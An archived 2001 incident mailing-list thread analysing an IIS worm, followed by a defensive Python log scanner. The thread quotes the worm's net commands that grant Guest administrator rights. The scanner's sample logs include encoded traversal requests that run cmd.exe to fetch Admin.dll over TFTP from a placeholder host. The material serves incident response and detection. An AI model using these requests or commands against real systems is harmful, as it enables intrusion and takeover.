Security Incidents mailing list archives

RE: Concept Virus(CV) V.5 - Advisory and Quick analysis


From: "Davis, Matt" <matt.davis () countryfinancial com>
Date: Wed, 19 Sep 2001 07:01:46 -0500

It uses TFTP to try to pull the admin.dll file from the 'attacking' system.

The default port for TFTP is 69, AFAIK.

Regards,
Matt

--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davis () countryfinancial com


-----Original Message-----
From: Robert Nieuwhof [mailto:RNieuwhof () nos com]
Sent: Tuesday, September 18, 2001 4:01 PM
To: 'Dave Sill'; Grady Fox
Cc: incidents () securityfocus com
Subject: RE: Concept Virus(CV) V.5 - Advisory and Quick analysis


Have you indeed confirmed that the worm utilizes port 69? If so, how was
this confirmed and will you please share the criteria and results of your
confirmational testing?

Thanks,
Robert J. Nieuwhof, CNA, MCP
mailto:Rnieuwhof () nos com
Network Engineer
NOS Communications - Information Services

http://www.nos.com

Madness takes its toll. Please have exact change. 

The information contained in this correspondence is confidential and
intended for the use of the individual or entity named above. Unauthorized
distribution is prohibited. Any and all opinions expressed are the
opinions of the author of this e-mail, and in no way reflect or imply the
opinions of NOS Communications.


-----Original Message-----
From: Dave Sill [mailto:davids () socket net]
Sent: Tuesday, September 18, 2001 11:13 AM
To: Grady Fox
Cc: incidents () securityfocus com
Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis


We've blocked 69/udp at our internal and border routers both incoming and
outgoing.  Be careful with your private networks.  Our tech support
department contracted this bug by opening a web page of an infected customer
in response to a complaint about performance.

Dave Sill
Server Admin
Socket Internet Services
davids () socket net

On Tuesday 18 September 2001 15:10, you wrote:
YES

--- Dave Sill <davids () socket net> wrote:
You say that the worm gets a payload by tftp...  Is
it using port 69?

Thanks,

Dave Sill
Server Admin
Socket Internet Services
davids () socket net

Is the worm

On Tuesday 18 September 2001 10:47, you wrote:
Hi all!


We've all just been hit by a VERY aggressive worm/virus.

Quick analysis indicates that it propagates itself in a number of
different ways:

Through use of IIS UNICODE directory traversal coupled with the recent
IIS .dll privilege escalation attack.

It uses SMB/CIFS and TFTP to get the worm payload.

Through MAPI mails (probably to all of addressbook).

Other ways of spreading may be possible, but we haven't yet had the time
to properly analyse the worm/virus.

It seems to share "c:\" via SMB/CIFS as "c$" and the worm/virus also adds
the "Guest" user and "Guests" group to the local "Administrators" group....


Interesting strings in binary:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security

share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net


More info as we come upon it.....

/olle


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com










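The thread above describes the worm's web-side propagation (an encoded IIS directory traversal, then a TFTP pull of admin.dll from the requesting host) and the decision to block 69/udp. The script below is an added defender-side example, not part of any message in this thread and not code from any of the posters: it scans IIS W3C-style log lines, normalises the request path the way the server eventually did (overlong UTF-8 sequences, repeated percent-decoding, backslash folding) and flags requests that traverse out of the web root or invoke TFTP. The log lines, the field order and the two overlong sequences in OVERLONG are assumptions I constructed for the example.

```python
"""Scan IIS W3C-style web log lines for the propagation pattern described
in this thread: an encoded directory-traversal request into the web root
and a TFTP fetch of a file from the requesting host.
Added example; the log lines below are constructed, not from any real server.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Overlong UTF-8 encodings of '/' and '\' that IIS decoded only after its
# traversal check. Assumption: the two best-known sequences, not an
# exhaustive list of what the bug accepted.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")   # a '..' path segment
TFTP_FETCH = re.compile(r"\btftp\b")        # tftp invoked via the query


def decode_path(raw: str) -> str:
    """Normalise a request path the way a defender must: lower-case it,
    expand overlong UTF-8 sequences, percent-decode repeatedly (so %255c
    becomes %5c becomes '\\'), and fold backslashes to forward slashes."""
    s = raw.lower()
    prev = None
    while s != prev:          # loop until decoding reaches a fixed point
        prev = s
        for seq, ch in OVERLONG.items():
            s = s.replace(seq, ch)
        s = unquote(s, errors="replace")
    return s.replace("\\", "/")


@dataclass
class Hit:
    client: str
    path: str
    reasons: List[str]


def classify(line: str) -> Optional[Hit]:
    """Assumed (constructed) field order, W3C extended style:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"""
    parts = line.split()
    if len(parts) < 7:
        return None
    client, stem, query = parts[2], parts[4], parts[5]
    path = decode_path(stem)
    reasons = []
    if TRAVERSAL.search(path):
        reasons.append("traversal after decoding")
    if path.endswith("/cmd.exe"):
        reasons.append("command interpreter requested")
    # '+' is the logged form of a space inside the query string
    if TFTP_FETCH.search(decode_path(query).replace("+", " ")):
        reasons.append("tftp fetch in query")
    return Hit(client, path, reasons) if reasons else None


def scan(lines) -> List[Hit]:
    """Return one Hit per suspicious line, in log order."""
    return [h for h in (classify(line) for line in lines) if h]


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    "2001-09-18 10:02:11 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.77+GET+Admin.dll 200",
    "2001-09-18 10:02:12 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200",
    "2001-09-18 10:05:40 198.51.100.9 GET /index.html - 200",
    "2001-09-18 10:06:01 198.51.100.9 GET /images/logo.gif - 304",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit.client, hit.path, "; ".join(hit.reasons))
```

The point of decoding to a fixed point is that a single pass misses the double-encoded form (%255c), and a plain percent-decoder turns the overlong sequences into replacement characters rather than the slash the server saw; matching on the raw stem would miss both. On a real server the same logic runs over the live log, and a hit from a client that also shows up in firewall drops on 69/udp is a strong sign of an infected neighbour rather than a curious scanner.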

